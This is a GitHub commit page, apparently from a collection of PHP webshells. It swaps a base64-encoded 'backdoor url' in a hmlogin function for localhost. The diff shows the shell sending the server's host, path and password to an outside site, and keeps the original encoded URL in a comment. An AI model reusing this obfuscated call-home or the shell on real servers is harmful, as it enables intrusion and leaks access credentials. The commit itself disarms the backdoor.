Skip to content

Commit

Permalink
Update DOC_ZIBSZXBIEG.php
Browse files Browse the repository at this point in the history
change backdoor url to http://127.0.0.1//
  • Loading branch information
tennc authored Jul 25, 2018
1 parent e872ddd commit a66ed66
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions www-7jyewu-cn/DOC_ZIBSZXBIEG.php
Original file line number Diff line number Diff line change
Expand Up @@ -1265,7 +1265,7 @@ function hmlogin($xiao=1){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
$copyurl = base64_decode('aHR0cDovLzEyNy4wLjAuMS8v'); //aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
$re=file_get_contents($url);
Expand Down Expand Up @@ -2485,4 +2485,4 @@ function ExtractFile($header,$to,$zip){
}
ob_end_flush();

?>
?>

0 comments on commit a66ed66

Please sign in to comment.